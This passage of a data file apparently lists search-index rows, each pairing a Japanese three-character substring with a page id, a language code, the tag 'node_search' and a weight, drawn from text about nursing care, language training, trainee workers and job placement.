('練習を', 138, 'ja', 'node_search', 1),
('績で合', 81, 'ja', 'node_search', 1),
('織され', 27, 'ja', 'node_search', 1),
('繕工事', 27, 'ja', 'node_search', 0.659351),
('置き換', 87, 'ja', 'node_search', 0.674137),
('置につ', 30, 'ja', 'node_search', 1.84234),
('義で輸', 27, 'ja', 'node_search', 0.344608),
('習が始', 140, 'ja', 'node_search', 1),
('習され', 182, 'ja', 'node_search', 1),
('習する', 138, 'ja', 'node_search', 0.774192),
('習のた', 27, 'ja', 'node_search', 0.766757),
('習のサ', 62, 'ja', 'node_search', 0.749958),
('習の成', 180, 'ja', 'node_search', 1),
('習の成', 182, 'ja', 'node_search', 4),
('習の成', 199, 'ja', 'node_search', 1),
('習の旅', 62, 'ja', 'node_search', 0.942091),
('習の目', 135, 'ja', 'node_search', 19),
('習の積', 179, 'ja', 'node_search', 1),
('習や準', 176, 'ja', 'node_search', 1),
('習や準', 191, 'ja', 'node_search', 1),
('習や面', 173, 'ja', 'node_search', 1),
('習や面', 184, 'ja', 'node_search', 1),
('習を促', 135, 'ja', 'node_search', 0.909743),
('習を受', 136, 'ja', 'node_search', 0.774192),
('習を強', 142, 'ja', 'node_search', 0.934703),
('習を通', 138, 'ja', 'node_search', 1),
('習を通', 181, 'ja', 'node_search', 1),
('習を重', 24, 'ja', 'node_search', 1),
('習クラ', 133, 'ja', 'node_search', 20),
('習ルー', 142, 'ja', 'node_search', 0.685676),
('習意欲', 195, 'ja', 'node_search', 1),
('習慣を', 87, 'ja', 'node_search', 0.800068),
('習成果', 182, 'ja', 'node_search', 27),
('習授業', 98, 'ja', 'node_search', 19),
('習生ビ', 24, 'ja', 'node_search', 0.655756),
('習看護', 136, 'ja', 'node_search', 19),
('習課程', 181, 'ja', 'node_search', 1),
('習課程', 183, 'ja', 'node_search', 1),
('考えに', 87, 'ja', 'node_search', 0.679856),
('考えを', 87, 'ja', 'node_search', 0.725015),
('者から', 25, 'ja', 'node_search', 1),
('者が日', 154, 'ja', 'node_search', 0.786915),
('者が特', 154, 'ja', 'node_search', 1),
('者が特', 165, 'ja', 'node_search', 3.99983),
('者が特', 167, 'ja', 'node_search', 1.81645),
('者が特', 169, 'ja', 'node_search', 3.16849),
('者が特', 173, 'ja', 'node_search', 4.04752),
('者が特', 176, 'ja', 'node_search', 1.74069),
('者が遭', 138, 'ja', 'node_search', 0.712106),
('者たち', 23, 'ja', 'node_search', 1.07706),
('者でも', 62, 'ja', 'node_search', 4),
('者とし', 5, 'ja', 'node_search', 3),
('者とし', 8, 'ja', 'node_search', 27),
('者とと', 27, 'ja', 'node_search', 0.585658),
('者と永', 25, 'ja', 'node_search', 1),
('者に対', 3, 'ja', 'node_search', 0.544759),
('者のた', 3, 'ja', 'node_search', 0.697623),
('者の労', 3, 'ja', 'node_search', 0.63333),
('者の生', 188, 'ja', 'node_search', 1),
('者の間', 26, 'ja', 'node_search', 1),
('者はニ', 138, 'ja', 'node_search', 1),
('者は優', 162, 'ja', 'node_search', 0.646943),
('者をシ', 30, 'ja', 'node_search', 28),
('者を募', 135, 'ja', 'node_search', 0.738408),
('者を対', 162, 'ja', 'node_search', 1),
('者介護', 136, 'ja', 'node_search', 0.792123),
('者向け', 7, 'ja', 'node_search', 1.84332),
('者様の', 162, 'ja', 'node_search', 0.968904),
('者歓迎', 163, 'ja', 'node_search', 0.707906),
('者達に', 24, 'ja', 'node_search', 0.7017),
('聞いて', 87, 'ja', 'node_search', 0.968904),
('聴解力', 62, 'ja', 'node_search', 0.869951),
('職など', 183, 'ja', 'node_search', 0.96498),
('職に向', 182, 'ja', 'node_search', 0.96498),
('職に就', 98, 'ja', 'node_search', 1),
('職の応', 133, 'ja', 'node_search', 0.714225),
('職の面', 115, 'ja', 'node_search', 1),
('職への', 181, 'ja', 'node_search', 0.931053),
('職もサ', 23, 'ja', 'node_search', 0.521322),
('職や専', 7, 'ja', 'node_search', 1.8861),
('職を支', 173, 'ja', 'node_search', 0.781775),
('職を支', 174, 'ja', 'node_search', 0.740689),
('職を支', 175, 'ja', 'node_search', 0.78951),
('職を支', 176, 'ja', 'node_search', 0.759465),
('職を目', 155, 'ja', 'node_search', 1),
('職を見', 3, 'ja', 'node_search', 0.601716),
('職を辞', 3, 'ja', 'node_search', 0.621888),
('職候補', 142, 'ja', 'node_search', 0.776703),
('職員住', 27, 'ja', 'node_search', 0.371011),
('職場で', 24, 'ja', 'node_search', 0.464545),
('職場で', 87, 'ja', 'node_search', 1.9347),
('職場で', 136, 'ja', 'node_search', 0.931053),
('職場で', 140, 'ja', 'node_search', 0.931053),
('職場で', 155, 'ja', 'node_search', 1),
('職場で', 167, 'ja', 'node_search', 1),
('職場の', 87, 'ja', 'node_search', 1),
('職場を', 3, 'ja', 'node_search', 0.681785),
('職場環', 120, 'ja', 'node_search', 0.909743),
('職場経', 136, 'ja', 'node_search', 0.76188),
('職支援', 161, 'ja', 'node_search', 0.830633),
('職業で', 188, 'ja', 'node_search', 0.923838),
('職業や', 3, 'ja', 'node_search', 0.836446),
('職業経', 194, 'ja', 'node_search', 1),
('職活動', 179, 'ja', 'node_search', 0.869951),
('職研修', 121, 'ja', 'node_search', 1),
('職面接', 132, 'ja', 'node_search', 1),
('肉の命', 133, 'ja', 'node_search', 1),
('育てま', 87, 'ja', 'node_search', 0.581429),
('育と学', 27, 'ja', 'node_search', 0.774192),
('育みま', 135, 'ja', 'node_search', 0.857458),
('育を提', 135, 'ja', 'node_search', 1),
('育んで', 120, 'ja', 'node_search', 0.892724),
('育成し', 23, 'ja', 'node_search', 0.427163),
('育成と', 161, 'ja', 'node_search', 0.845322),
('背後に', 122, 'ja', 'node_search', 0.968904),
('能など', 24, 'ja', 'node_search', 0.824901),
('能ビザ', 62, 'ja', 'node_search', 0.714225),
('能人材', 155, 'ja', 'node_search', 0.839384),
('能力で', 27, 'ja', 'node_search', 0.422007),
('能力に', 136, 'ja', 'node_search', 0.722831),
('能力の', 18, 'ja', 'node_search', 1),
('能力の', 23, 'ja', 'node_search', 0.433985),
('能力の', 25, 'ja', 'node_search', 1),
('能力の', 26, 'ja', 'node_search', 1),
('能力の', 181, 'ja', 'node_search', 1),
('能力の', 182, 'ja', 'node_search', 1.88282),
('能力の', 183, 'ja', 'node_search', 1),
('能力を', 7, 'ja', 'node_search', 28.8861),
('能力試', 23, 'ja', 'node_search', 0.464545),
('能力試', 24, 'ja', 'node_search', 0.725015),
('能力試', 62, 'ja', 'node_search', 0.569105),
('能力試', 181, 'ja', 'node_search', 1),
('能力試', 182, 'ja', 'node_search', 1),
('能力試', 183, 'ja', 'node_search', 1),
('能対策', 155, 'ja', 'node_search', 5),
('能性が', 8, 'ja', 'node_search', 2),
('能性と', 197, 'ja', 'node_search', 1),
('能性の', 62, 'ja', 'node_search', 0.500884),
('能性の', 138, 'ja', 'node_search', 0.697623),
('能性へ', 191, 'ja', 'node_search', 0.931053),
('能性を', 120, 'ja', 'node_search', 1),
('能性を', 183, 'ja', 'node_search', 0.927431),
('能性を', 196, 'ja', 'node_search', 0.989021),
('能試験', 155, 'ja', 'node_search', 28.7571),
('臣によ', 9, 'ja', 'node_search', 3),
('臣によ', 17, 'ja', 'node_search', 4),
('自に面', 142, 'ja', 'node_search', 0.827757),
('自信の', 163, 'ja', 'node_search', 0.693594),
('自信を', 136, 'ja', 'node_search', 0.716357),
('自分に', 23, 'ja', 'node_search', 0.496787),
('自分の', 77, 'ja', 'node_search', 4),
('自分の', 87, 'ja', 'node_search', 0.650439),
('自分ら', 23, 'ja', 'node_search', 0.506102),
('自動車', 23, 'ja', 'node_search', 1.98902),
('自動車', 27, 'ja', 'node_search', 1.92581),
('自宅を', 162, 'ja', 'node_search', 0.953396),
('自己管', 5, 'ja', 'node_search', 0.993146),
('興味の', 155, 'ja', 'node_search', 0.722831),
('興味の', 163, 'ja', 'node_search', 0.641769),
('興味を', 24, 'ja', 'node_search', 0.643484),
('興味を', 142, 'ja', 'node_search', 1),
('舞いを', 87, 'ja', 'node_search', 0.876337),
('般労働', 5, 'ja', 'node_search', 3),
('船員の', 27, 'ja', 'node_search', 0.346538),
('船所か', 9, 'ja', 'node_search', 3),
('船所か', 17, 'ja', 'node_search', 4),
('船所で', 6, 'ja', 'node_search', 28),
('船所で', 8, 'ja', 'node_search', 27),
('船所で', 10, 'ja', 'node_search', 28),
('船所で', 23, 'ja', 'node_search', 0.606252),
('船所で', 24, 'ja', 'node_search', 1),
('良いで', 3, 'ja', 'node_search', 0.779231),
('良いで', 30, 'ja', 'node_search', 0.923838),
('良いネ', 24, 'ja', 'node_search', 0.511433),
('良い息', 87, 'ja', 'node_search', 0.587082),
('良い機', 111, 'ja', 'node_search', 1),
('良い知', 30, 'ja', 'node_search', 1.84234),
('良い車', 27, 'ja', 'node_search', 0.304118),
('若者た', 23, 'ja', 'node_search', 0.510357),
('英語な', 24, 'ja', 'node_search', 0.554747),
('英語を', 5, 'ja', 'node_search', 0.769219),
('英語を', 18, 'ja', 'node_search', 0.949597),
('英語を', 30, 'ja', 'node_search', 1.84234),
('英語学', 24, 'ja', 'node_search', 0.882818),
('茨城県', 163, 'ja', 'node_search', 28.9611),
('荷準備', 163, 'ja', 'node_search', 0.876337),
('菜や肉', 133, 'ja', 'node_search', 1),
('葉を抱', 62, 'ja', 'node_search', 0.533952),
('行うお', 162, 'ja', 'node_search', 0.902857),
('行う個', 27, 'ja', 'node_search', 0.339412),
('行きた', 24, 'ja', 'node_search', 0.387358),
('行くた', 19, 'ja', 'node_search', 3),
('行しま', 7, 'ja', 'node_search', 1.77882),
('行って', 5, 'ja', 'node_search', 0.972861),
('行って', 23, 'ja', 'node_search', 1.54111),
('行って', 24, 'ja', 'node_search', 0.959978),
('行って', 27, 'ja', 'node_search', 0.549707),
('行って', 179, 'ja', 'node_search', 0.819249),
('行や車', 162, 'ja', 'node_search', 0.766757),
('行われ', 142, 'ja', 'node_search', 2),
('行を支', 142, 'ja', 'node_search', 0.636679),
('行ロー', 3, 'ja', 'node_search', 0.989021),
('術だけ', 190, 'ja', 'node_search', 1),
('術を学', 3, 'ja', 'node_search', 0.920273),
('術を学', 23, 'ja', 'node_search', 0.482973),
('術を活', 195, 'ja', 'node_search', 1),
('術を身', 193, 'ja', 'node_search', 0.957226),
('術分野', 7, 'ja', 'node_search', 1.8861),
('術的な', 122, 'ja', 'node_search', 1),
('術者と', 8, 'ja', 'node_search', 27),
('術者の', 3, 'ja', 'node_search', 0.699655),
('術者の', 19, 'ja', 'node_search', 28),
('術者向', 7, 'ja', 'node_search', 1.84718),
('衣類関', 24, 'ja', 'node_search', 0.592848),
('表して', 133, 'ja', 'node_search', 0.816452),
('表れで', 188, 'ja', 'node_search', 1),
('表現を', 24, 'ja', 'node_search', 0.431687),
('装をし', 87, 'ja', 'node_search', 0.902857),
('装作業', 163, 'ja', 'node_search', 0.882818),
('装置に', 30, 'ja', 'node_search', 1.84234),
('裏には', 191, 'ja', 'node_search', 1),
('補生が', 157, 'ja', 'node_search', 1),
('補生は', 157, 'ja', 'node_search', 1),
('補者か', 25, 'ja', 'node_search', 1),
('補者が', 154, 'ja', 'node_search', 1.78691),
('補者が', 165, 'ja', 'node_search', 3.99983),
('補者が', 167, 'ja', 'node_search', 1.81645),
('補者が', 169, 'ja', 'node_search', 4.16849),
('補者が', 173, 'ja', 'node_search', 4.04752),
('補者が', 176, 'ja', 'node_search', 1.74069),
('補者と', 25, 'ja', 'node_search', 1),
('補者は', 138, 'ja', 'node_search', 1),
('補者は', 142, 'ja', 'node_search', 0.771698),
('製造職', 115, 'ja', 'node_search', 1),
('複雑な', 27, 'ja', 'node_search', 0.454162),
('複雑な', 62, 'ja', 'node_search', 0.816452),
('要があ', 3, 'ja', 'node_search', 2.24098),
('要があ', 5, 'ja', 'node_search', 0.945829),
('要があ', 18, 'ja', 'node_search', 1.9496),
('要があ', 155, 'ja', 'node_search', 0.805455),
('要がな', 142, 'ja', 'node_search', 0.802752),
('要です', 3, 'ja', 'node_search', 2.26502),
('要です', 30, 'ja', 'node_search', 5.52703),
('要です', 140, 'ja', 'node_search', 0.827757),
('要でや', 188, 'ja', 'node_search', 0.957226),
('要とさ', 5, 'ja', 'node_search', 3),
('要とさ', 24, 'ja', 'node_search', 0.438659),
('要とな', 155, 'ja', 'node_search', 1),
('要な一', 196, 'ja', 'node_search', 0.961087),
('要な内', 6, 'ja', 'node_search', 3),
('要な場', 5, 'ja', 'node_search', 1),
('要な場', 24, 'ja', 'node_search', 0.548462),
('要な成', 181, 'ja', 'node_search', 0.980874),
('要な第', 180, 'ja', 'node_search', 0.953396),
('要な資', 183, 'ja', 'node_search', 0.902857),
('要はあ', 3, 'ja', 'node_search', 0.845322),
('要はあ', 5, 'ja', 'node_search', 0.899454),
('要はあ', 98, 'ja', 'node_search', 1),
('要もな', 135, 'ja', 'node_search', 1),
('要件は', 5, 'ja', 'node_search', 0.774192),
('要件を', 24, 'ja', 'node_search', 0.460161),
('要性を', 122, 'ja', 'node_search', 2),
('見せか', 135, 'ja', 'node_search', 1),
('見せな', 80, 'ja', 'node_search', 1),
('見つけ', 3, 'ja', 'node_search', 1.17876),
('見つけ', 23, 'ja', 'node_search', 0.487816),
('見抜き', 26, 'ja', 'node_search', 1),
('見込み', 29, 'ja', 'node_search', 3),
('見逃し', 62, 'ja', 'node_search', 0.51578),
('規定す', 3, 'ja', 'node_search', 0.553478),
('規律の', 122, 'ja', 'node_search', 1),
('規模の', 23, 'ja', 'node_search', 1),
('規開講', 155, 'ja', 'node_search', 5),
('視察し', 9, 'ja', 'node_search', 3),
('視察し', 17, 'ja', 'node_search', 4),
('覚えて', 87, 'ja', 'node_search', 16),
('覧くだ', 1, 'ja', 'node_search', 1),
('親を常', 80, 'ja', 'node_search', 1),
('親を誇', 87, 'ja', 'node_search', 0.601716),
('解して', 77, 'ja', 'node_search', 4),
('解する', 3, 'ja', 'node_search', 1.04314),
('解する', 87, 'ja', 'node_search', 1),
('解する', 122, 'ja', 'node_search', 2),
('解でき', 3, 'ja', 'node_search', 0.520204),
('解でき', 5, 'ja', 'node_search', 0.754681),
('解力を', 62, 'ja', 'node_search', 1.72118),
('言うこ', 87, 'ja', 'node_search', 0.997306),
('言葉を', 62, 'ja', 'node_search', 0.535131),
('言語が', 24, 'ja', 'node_search', 0.972861),
('言語だ', 24, 'ja', 'node_search', 0.794753),
('言語の', 62, 'ja', 'node_search', 0.487816),
('言語は', 3, 'ja', 'node_search', 0.873132),
('言語セ', 62, 'ja', 'node_search', 1.27927),
('言語不', 138, 'ja', 'node_search', 0.854391),
('言語学', 62, 'ja', 'node_search', 1.70335),
('言語要', 24, 'ja', 'node_search', 0.461904),
('計され', 140, 'ja', 'node_search', 0.866793),
('計図作', 27, 'ja', 'node_search', 0.537506),
('計算な', 27, 'ja', 'node_search', 0.532778),
('訓練を', 23, 'ja', 'node_search', 0.559882),
('訓練校', 9, 'ja', 'node_search', 3),
('訓練校', 17, 'ja', 'node_search', 4),
('記のサ', 24, 'ja', 'node_search', 0.487816),
('記の活', 27, 'ja', 'node_search', 0.695602),
('記練習', 138, 'ja', 'node_search', 1),
('記録保', 30, 'ja', 'node_search', 1.84234),
('訪問い', 1, 'ja', 'node_search', 1),
('訪問し', 162, 'ja', 'node_search', 0.942091),
('訪問介', 162, 'en', 'node_search', 1),
('訪問介', 162, 'ja', 'node_search', 33),
('設して', 27, 'ja', 'node_search', 0.403922),
('設しま', 24, 'ja', 'node_search', 0.449975),
('設での', 155, 'ja', 'node_search', 1),
('設で実', 136, 'ja', 'node_search', 0.781775),
('設プロ', 27, 'ja', 'node_search', 0.450806),
('設会社', 27, 'ja', 'node_search', 0.718502),
('設前サ', 27, 'ja', 'node_search', 0.399972),
('設勤務', 162, 'ja', 'node_search', 1),
('設工事', 27, 'ja', 'node_search', 0.554747),
('設業を', 27, 'ja', 'node_search', 0.876337),
('設機械', 27, 'ja', 'node_search', 0.892724),
('設現場', 5, 'ja', 'node_search', 3),
('設現場', 23, 'ja', 'node_search', 0.953396),
('設立さ', 23, 'ja', 'node_search', 1),
('設立さ', 27, 'ja', 'node_search', 2.56049),
('設立し', 23, 'ja', 'node_search', 1),
('設計さ', 140, 'ja', 'node_search', 0.869951),
('設計図', 27, 'ja', 'node_search', 1.161),
('設部長', 27, 'ja', 'node_search', 0.393562),
('許をお', 163, 'ja', 'node_search', 0.679856),
('許可を', 23, 'ja', 'node_search', 1.65852),
('許可証', 27, 'ja', 'node_search', 0.3427),
('証しま', 136, 'ja', 'node_search', 0.822065),
('証の売', 27, 'ja', 'node_search', 0.341754),
('証明す', 62, 'ja', 'node_search', 0.668514),
('証明す', 181, 'ja', 'node_search', 1),
('証明す', 182, 'ja', 'node_search', 1),
('証明す', 183, 'ja', 'node_search', 1),
('証明書', 62, 'ja', 'node_search', 0.661163),
('評価が', 142, 'ja', 'node_search', 1),
('評価さ', 120, 'ja', 'node_search', 0.997306),
('評価さ', 162, 'ja', 'node_search', 0.857458),
('評価結', 29, 'ja', 'node_search', 3),
('試験に', 142, 'ja', 'node_search', 1),
('試験に', 181, 'ja', 'node_search', 0.786915),
('試験に', 182, 'ja', 'node_search', 0.797402),
('試験に', 183, 'ja', 'node_search', 0.736141),
('試験の', 155, 'ja', 'node_search', 0.757065),
('試験を', 3, 'ja', 'node_search', 0.857458),
('試験を', 6, 'ja', 'node_search', 3),
('試験対', 155, 'ja', 'node_search', 29),
('話さな', 18, 'ja', 'node_search', 0.927431),
('話すこ', 30, 'ja', 'node_search', 1.84234),
('話クラ', 138, 'ja', 'node_search', 0.752312),
('話レベ', 163, 'ja', 'node_search', 0.729424),
('話力を', 87, 'ja', 'node_search', 0.833529),
('話方法', 28, 'ja', 'node_search', 1),
('詳しく', 1, 'ja', 'node_search', 1),
('詳細に', 155, 'ja', 'node_search', 0.685676),
('詳細に', 162, 'ja', 'node_search', 0.640063),
('詳細を', 62, 'ja', 'node_search', 2.57394),
('誇りと', 156, 'ja', 'node_search', 1),
('誇りと', 157, 'ja', 'node_search', 0.976851),
('誇りに', 69, 'ja', 'node_search', 1),
('誇りに', 87, 'ja', 'node_search', 0.59873),
('語が勉', 24, 'ja', 'node_search', 0.968904),
('語だけ', 24, 'ja', 'node_search', 0.792123),
('語で理', 3, 'ja', 'node_search', 1.03393),
('語など', 24, 'ja', 'node_search', 0.553478),
('語のア', 138, 'ja', 'node_search', 0.797402),
('語の会', 87, 'ja', 'node_search', 0.842342),
('語の授', 24, 'ja', 'node_search', 0.356535),
('語の達', 62, 'ja', 'node_search', 0.486839),
('語は重', 3, 'ja', 'node_search', 0.869951),
('語をマ', 24, 'ja', 'node_search', 0.399321),
('語を上', 18, 'ja', 'node_search', 0.945829),
('語を学', 87, 'ja', 'node_search', 0.851346),
('語を少', 5, 'ja', 'node_search', 0.766757),
('語を流', 30, 'ja', 'node_search', 1.84234),
('語クラ', 24, 'ja', 'node_search', 0.817475),
('語コー', 28, 'ja', 'node_search', 6),
('語セン', 62, 'ja', 'node_search', 1.27682),
('語チャ', 62, 'ja', 'node_search', 0.588512),
('語不安', 138, 'ja', 'node_search', 0.851346),
('語学の', 62, 'ja', 'node_search', 4),
('語学セ', 142, 'ja', 'node_search', 19),
('語学学', 24, 'ja', 'node_search', 0.345089),
('語学校', 24, 'ja', 'node_search', 3.55123),
('語学校', 181, 'ja', 'node_search', 1.7974),
('語学校', 182, 'ja', 'node_search', 4.2327),
('語学校', 183, 'ja', 'node_search', 1.74529),
('語学習', 62, 'ja', 'node_search', 1.69956),
('語学習', 173, 'ja', 'node_search', 1),
('語学習', 184, 'ja', 'node_search', 1),
('語彙を', 3, 'ja', 'node_search', 0.800068),
('語彙を', 62, 'ja', 'node_search', 0.830633),
('語教育', 135, 'ja', 'node_search', 1),
('語能力', 23, 'ja', 'node_search', 0.465433),
('語能力', 24, 'ja', 'node_search', 0.727213),
('語能力', 62, 'ja', 'node_search', 0.570448),
('語能力', 136, 'ja', 'node_search', 0.725015),
('語能力', 163, 'ja', 'node_search', 0.714225),
('語能力', 181, 'ja', 'node_search', 2),
('語能力', 182, 'ja', 'node_search', 2.88282),
('語能力', 183, 'ja', 'node_search', 2),
('語要件', 24, 'ja', 'node_search', 0.461031),
('誠にお', 187, 'ja', 'node_search', 0.76188),
('誠にお', 190, 'ja', 'node_search', 0.794753),
('誠にお', 194, 'ja', 'node_search', 0.776703),
('誠にお', 197, 'ja', 'node_search', 0.794753),
('誠実さ', 25, 'ja', 'node_search', 1),
('説明さ', 6, 'ja', 'node_search', 3),
('説明し', 29, 'ja', 'node_search', 3),
('読解力', 62, 'ja', 'node_search', 0.857458),
('誰が参', 3, 'ja', 'node_search', 43),
('誰もが', 120, 'ja', 'node_search', 1),
('課程を', 181, 'ja', 'node_search', 1),
('課程を', 183, 'ja', 'node_search', 1),
('課題を', 138, 'ja', 'node_search', 0.679856),
('調さを', 142, 'ja', 'node_search', 1),
('調に進', 154, 'ja', 'node_search', 0.961087),
('調に進', 178, 'ja', 'node_search', 0.931053),
('調に進', 187, 'ja', 'node_search', 0.848323),
('調に進', 190, 'ja', 'node_search', 0.889397),
('調に進', 194, 'ja', 'node_search', 0.866793),
('論クラ', 140, 'ja', 'node_search', 1),
('講いた', 155, 'ja', 'node_search', 1),
('講のお', 155, 'ja', 'node_search', 2),
('講のチ', 62, 'ja', 'node_search', 4),
('講師か', 138, 'ja', 'node_search', 1),
('講師が', 133, 'ja', 'node_search', 2),
('講師の', 133, 'ja', 'node_search', 0.848323),
('講期間', 155, 'ja', 'node_search', 0.882818),
('謝しま', 69, 'ja', 'node_search', 1),
('謝申し', 133, 'ja', 'node_search', 0.797402),
('識と理', 30, 'ja', 'node_search', 1.84234),
('識と経', 62, 'ja', 'node_search', 1),
('識やマ', 155, 'ja', 'node_search', 1),
('識や技', 190, 'ja', 'node_search', 1),
('識や技', 193, 'ja', 'node_search', 0.968904),
('識や技', 195, 'ja', 'node_search', 1),
('識を学', 133, 'ja', 'node_search', 0.896076),
('識を身', 142, 'ja', 'node_search', 0.71),
('議では', 3, 'ja', 'node_search', 0.736141),
('護のお', 162, 'ja', 'node_search', 1),
('護の仕', 188, 'ja', 'node_search', 1),
('護の仕', 189, 'ja', 'node_search', 1),
('護の専', 170, 'ja', 'node_search', 0.851346),
('護の面', 136, 'ja', 'node_search', 1),
('護の面', 141, 'ja', 'node_search', 1),
('護クラ', 136, 'ja', 'node_search', 19),
('護サー', 162, 'ja', 'node_search', 0.833529),
('護スタ', 162, 'ja', 'node_search', 31),
('護ビザ', 24, 'ja', 'node_search', 0.383732),
('護人材', 162, 'ja', 'node_search', 1),
('護分野', 165, 'ja', 'node_search', 1),
('護分野', 169, 'ja', 'node_search', 1),
('護分野', 170, 'ja', 'node_search', 5),
('護分野', 171, 'ja', 'node_search', 1),
('護分野', 178, 'ja', 'node_search', 1.83353),
('護分野', 188, 'ja', 'node_search', 1),
('護分野', 189, 'ja', 'node_search', 1),
('護施設', 136, 'ja', 'node_search', 0.786915),
('護施設', 162, 'ja', 'node_search', 1),
('護求人', 162, 'ja', 'node_search', 1),
('護現場', 188, 'ja', 'node_search', 0.902857),
('護経験', 162, 'ja', 'node_search', 0.652202),
('護職研', 121, 'ja', 'node_search', 1),
('護関係', 24, 'ja', 'node_search', 1.24038),
('豊かな', 116, 'ja', 'node_search', 1),
('豊かな', 122, 'ja', 'node_search', 0.949597),
('豊富で', 23, 'ja', 'node_search', 0.436309),
('豊富な', 7, 'ja', 'node_search', 3.70614),
('豊富な', 8, 'ja', 'node_search', 2),
('豊富な', 10, 'ja', 'node_search', 3),
('豊富な', 18, 'ja', 'node_search', 1),
('豊富な', 23, 'ja', 'node_search', 0.574516),
('豊富な', 24, 'ja', 'node_search', 1),
('豊富な', 135, 'ja', 'node_search', 1),
('豊富な', 136, 'ja', 'node_search', 1),
('豊富な', 138, 'ja', 'node_search', 1),
('象とし', 140, 'ja', 'node_search', 20),
('象とし', 162, 'ja', 'node_search', 1),
('象とし', 163, 'ja', 'node_search', 1),
('負けな', 25, 'ja', 'node_search', 1),
('負けな', 26, 'ja', 'node_search', 1),
('財政的', 3, 'ja', 'node_search', 1),
('販売す', 23, 'ja', 'node_search', 0.845322),
('販売と', 27, 'ja', 'node_search', 0.906287),
('販売を', 27, 'ja', 'node_search', 0.318099),
('責任が', 142, 'ja', 'node_search', 0.670377),
('責任感', 162, 'ja', 'node_search', 0.679856),
('責任感', 189, 'ja', 'node_search', 1),
('責任者', 27, 'ja', 'node_search', 0.601716),
('貴重な', 62, 'ja', 'node_search', 0.7017),
('貴重な', 120, 'ja', 'node_search', 1),
('貴重な', 136, 'ja', 'node_search', 0.769219),
('買い物', 162, 'ja', 'node_search', 0.749958),
('買を行', 27, 'ja', 'node_search', 0.340344),
('買経験', 30, 'ja', 'node_search', 1.84234),
('費は実', 163, 'ja', 'node_search', 0.749958),
('費は支', 5, 'ja', 'node_search', 0.920273),
('費を差', 8, 'ja', 'node_search', 2),
('費を支', 18, 'ja', 'node_search', 1),
('費負担', 163, 'ja', 'node_search', 0.742984),
('資する', 3, 'ja', 'node_search', 1),
('資格で', 156, 'ja', 'node_search', 1),
('資格で', 157, 'ja', 'node_search', 1),
('資格で', 183, 'ja', 'node_search', 0.896076),
('資格の', 27, 'ja', 'node_search', 0.312506),
('資格保', 162, 'ja', 'node_search', 1.68961),
('資機材', 27, 'ja', 'node_search', 0.565115),
('資源開', 27, 'ja', 'node_search', 0.792123),
('資質を', 189, 'ja', 'node_search', 0.931053),
('賛しま', 140, 'ja', 'node_search', 1),
('賛を受', 27, 'ja', 'node_search', 0.412068),
('賛を深', 122, 'ja', 'node_search', 0.909743),
('賞与含', 162, 'ja', 'node_search', 0.714225),
('賞賛を', 27, 'ja', 'node_search', 0.412762),
('賞賛を', 122, 'ja', 'node_search', 0.913226),
('質を十', 189, 'ja', 'node_search', 0.927431),
('質問や', 1, 'ja', 'node_search', 1),
('購買経', 30, 'ja', 'node_search', 1.84234),
('越した', 120, 'ja', 'node_search', 0.98493),
('越し続', 116, 'ja', 'node_search', 1),
('足いた', 27, 'ja', 'node_search', 0.305983),
('路交通', 27, 'ja', 'node_search', 0.747619),
('践的な', 116, 'ja', 'node_search', 1),
('践的な', 135, 'ja', 'node_search', 0.879565),
('践的な', 136, 'ja', 'node_search', 0.857458),
('践的な', 138, 'ja', 'node_search', 0.957226),
('践的な', 142, 'ja', 'node_search', 0.733888),
('踏み出', 175, 'ja', 'node_search', 1),
('踏み出', 177, 'ja', 'node_search', 0.869951),
('踏み出', 184, 'ja', 'node_search', 0.886095),
('踏み出', 190, 'ja', 'node_search', 0.938382),
('躍が大', 126, 'ja', 'node_search', 1),
('躍が大', 180, 'ja', 'node_search', 0.920273),
('躍が大', 186, 'ja', 'node_search', 0.953396),
('躍が期', 185, 'ja', 'node_search', 0.863659),
('躍が期', 199, 'ja', 'node_search', 0.879565),
('躍され', 154, 'ja', 'node_search', 0.882818),
('躍され', 177, 'ja', 'node_search', 0.736141),
('躍され', 183, 'ja', 'node_search', 0.805455),
('躍され', 188, 'ja', 'node_search', 0.889397),
('躍され', 190, 'ja', 'node_search', 0.833529),
('躍され', 195, 'ja', 'node_search', 0.980874),
('躍した', 189, 'ja', 'node_search', 1),
('躍する', 136, 'ja', 'node_search', 0.879565),
('躍する', 188, 'ja', 'node_search', 1),
('躍する', 192, 'ja', 'node_search', 0.980874),
('躍とさ', 171, 'ja', 'node_search', 0.822065),
('躍とさ', 180, 'ja', 'node_search', 0.833529),
('躍とさ', 196, 'ja', 'node_search', 0.830633),
('躍と充', 169, 'ja', 'node_search', 0.842342),
('躍と充', 176, 'ja', 'node_search', 0.854391),
('躍と明', 192, 'ja', 'node_search', 0.808176),
('躍をお', 160, 'ja', 'node_search', 0.854391),
('躍をお', 161, 'ja', 'node_search', 0.902857),
('躍をお', 166, 'ja', 'node_search', 0.882818),
('躍をお', 168, 'ja', 'node_search', 0.886095),
('躍をお', 170, 'ja', 'node_search', 0.896076),
('躍をお', 178, 'ja', 'node_search', 0.805455),
('躍をお', 179, 'ja', 'node_search', 0.747619),
('躍をお', 181, 'ja', 'node_search', 0.816452),
('躍をお', 188, 'ja', 'node_search', 0.774192),
('躍をお', 191, 'ja', 'node_search', 0.822065),
('躍をお', 193, 'ja', 'node_search', 0.808176),
('躍をお', 195, 'ja', 'node_search', 0.830633),
('躍をお', 198, 'ja', 'node_search', 0.794753),
('躍を心', 182, 'ja', 'node_search', 0.866793),
('身につ', 193, 'ja', 'node_search', 0.949597),
('身に付', 138, 'ja', 'node_search', 0.913226),
('身に付', 140, 'ja', 'node_search', 0.896076),
('身に付', 142, 'ja', 'node_search', 0.705825),
('身を目', 135, 'ja', 'node_search', 0.827757),
('身体介', 162, 'ja', 'node_search', 0.774192),
('身的な', 80, 'ja', 'node_search', 1),
('身的な', 140, 'ja', 'node_search', 0.976851),
('車の輸', 23, 'ja', 'node_search', 0.98493),
('車を日', 27, 'ja', 'node_search', 0.303378),
('車修理', 24, 'ja', 'node_search', 0.615536),
('車商社', 27, 'ja', 'node_search', 0.350467),
('車売買', 23, 'ja', 'node_search', 1),
('車椅子', 162, 'ja', 'node_search', 0.76188),
('車販売', 27, 'ja', 'node_search', 0.909743),
('転免許', 163, 'ja', 'node_search', 0.683725),
('軽にお', 1, 'ja', 'node_search', 1),
('軽にお', 155, 'ja', 'node_search', 0.650439),
('軽減し', 138, 'ja', 'node_search', 0.676032),
('軽減す', 138, 'ja', 'node_search', 0.839384),
('輩を尊', 87, 'ja', 'node_search', 1),
('輸入し', 23, 'ja', 'node_search', 0.848323),
('輸入し', 27, 'ja', 'node_search', 0.301181),
('輸入許', 23, 'ja', 'node_search', 0.976851),
